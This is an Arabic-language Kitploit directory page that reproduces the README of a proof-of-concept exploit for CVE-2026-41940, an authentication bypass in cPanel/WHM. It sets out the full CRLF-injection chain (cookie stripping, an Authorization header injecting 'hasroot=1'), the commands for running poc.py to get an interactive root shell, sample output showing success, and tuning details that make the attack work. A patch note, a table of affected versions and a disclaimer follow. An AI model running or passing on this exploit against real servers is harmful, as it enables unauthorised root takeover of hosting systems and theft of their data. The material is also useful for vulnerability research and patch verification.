Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0xabdoulaye/cpanel-cve-2026-41940
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHub0xabdoulaye/cpanel-cve-2026-41940

CPANEL-CVE-2026-41940

إثبات مفهوم لاستغلال CVE-2026-41940، وهو تجاوز حرج لمصادقة cPanel/WHM عبر حقن CRLF، مما يتيح وصولاً غير مصادق عليه بصلاحيات الجذر (root) وقشرة تفاعلية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
21منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-41940 — cPanel/WHM تجاوز المصادقة

المؤلف: SilySec
البحث الأصلي: Sina Kheirkhah (@SinSinology) / watchTowr Labs
الخطورة: حرجة (CVSS 9.8)
النوع: حقن CRLF ← تجاوز المصادقة ← شل بصلاحيات root


الوصف

CVE-2026-41940 هي ثغرة أمنية حرجة في cPanel/WHM تسمح لمهاجم غير مصادق بالحصول على وصول كامل بصلاحيات root عبر حقن CRLF في مدير المصادقة الأساسية (Basic) الخاص بـ cpsrvd.

تجمع الثغرة بين ثلاث نقاط ضعف:

  1. حقن CRLF غير مُصفّى — الدالة saveSession() في Cpanel/Session.pm لا تُنقّي الأحرف \r\n قبل الكتابة على القرص عندما يكون المفتاح <ob> غائبًا عن ملف تعريف الارتباط (cookie).
  2. المُرمِّز معطّل — بدون الجزء <obHEX> في ملف تعريف ارتباط الجلسة، لا يتم تفعيل المُرمِّز لكل جلسة، مما يترك بايتات CRLF مكتوبة كنص صريح في ملف الجلسة.
  3. إعادة تحميل الذاكرة المؤقتة (cache) — Cpanel::Session::Modify::save() يعيد قراءة الملف الخام ويرقّي مفاتيح CRLF المحقونة إلى ذاكرة JSON المؤقتة، مما يجعل الجلسة مصادقة بالكامل.

الإصدارات المتأثرة


سلسلة الاستغلال

root@kitploit:~
POST /login/?login_only=1          [كلمة مرور خاطئة]
  └─► cookie: whostmgrsession=:ID,<obHEX>

حذف ,<obHEX>  →  :ID          [تعطيل المُرمِّز]

GET / + Cookie: :ID
      + Authorization: Basic root:x\r\nhasroot=1\r\n...
  └─► cpsrvd يكتب بايتات CRLF الخام في ملف الجلسة

GET /scripts2/listaccts + Cookie: :ID   [بدون رمز أمان]
  └─► do_token_denied() → Cpanel::Session::Modify::save()
  └─► إعادة بناء ذاكرة JSON المؤقتة مع hasroot=1, tfa_verified=1

→ جلسة مصادقة بصلاحيات root

الاستخدام

المتطلبات الأساسية

root@kitploit:~
pip install requests
# لوضع --terminal (اختياري):
pip install paramiko

التحقق من الثغرة

root@kitploit:~
python3 poc.py --target https://الهدف:2087

الحصول على شل root تفاعلي

root@kitploit:~
python3 poc.py --target https://الهدف:2087 --terminal

فرض اسم المضيف الأساسي (canonical hostname)

root@kitploit:~
python3 poc.py --target https://1.2.3.4:2087 --hostname cpanel.exemple.com

مثال على المخرجات

root@kitploit:~
[*] target   : https://1.2.3.4:2087
[*] canonical: cpanel.exemple.com

[1/4] minting preauth session ...
       session  = :AbCdEfGh...,0123456789abcdef
       stripped = :AbCdEfGh...

[2/4] injecting CRLF payload ...
       307 → leaked token = /cpsess1234567890

[3/4] triggering cache propagation ...
       do_token_denied → Cpanel::Session::Modify::save() fired

[4/4] verifying root access ...

  ✔  AUTH BYPASS CONFIRMED
     cPanel version : 11.136.0.5
     cookie         : whostmgrsession=%3AAbCdEfGh...
     WHM URL        : https://1.2.3.4:2087/cpsess1234567890/

نقاط تقنية مهمة

  • يجب استخدام اسم المضيف الأساسي (canonical hostname) في ترويسة Host (وليس عنوان IP) — يدير cpsrvd الجلسات بشكل مختلف حسب اسم المضيف
  • يجب أن يكون الطابع الزمني (timestamp) في الحمولة 9999999999 (ثابت، مستقبل بعيد) — الطابع الزمني الحالي يفشل
  • ترتيب المفاتيح في الحمولة المحقونة مهم: يجب أن يأتي successful_internal_auth_with_timestamp أولاً

التصحيح

ينقل التصحيح استدعاء filter_sessiondata() إلى داخل saveSession() ويضيف ترميزًا شرطيًا عندما يكون المفتاح <ob> غائبًا، مما يمنع أي كتابة كنص صريح.

قم بتحديث cPanel/WHM فورًا إلى الإصدارات المُصحَّحة المذكورة أعلاه.


تحذير

تُوفَّر هذه الأداة لأغراض البحث والاختبار الداخلي فقط. أي استخدام على أنظمة دون إذن صريح يُعد غير قانوني. SilySec غير مسؤول عن أي استخدام سيئ.

تنزيل الأداة
الفرعآخر إصدار مُعرَّضالإصدار المُصحَّح
110.0.x11.110.0.9611.110.0.97
118.0.x11.118.0.6211.118.0.63
126.0.x11.126.0.5311.126.0.54
132.0.x11.132.0.2811.132.0.29
134.0.x11.134.0.1911.134.0.20
136.0.x11.136.0.511.136.0.6